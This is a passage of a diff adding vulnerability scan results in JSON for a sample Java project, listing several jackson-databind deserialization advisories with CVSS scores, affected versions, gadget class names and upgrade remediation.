+ "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:03.656527Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11112" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-58pp-9c76-5625" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:29:29.728517Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.113524Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2682", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + 
"severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.162608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:54.679784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.073265Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92404", + "probability": "0.04399", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11620" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h4rc-386g-6m85" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:55:38.169333Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:23Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:17.073265Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + 
"severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", 
+ "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
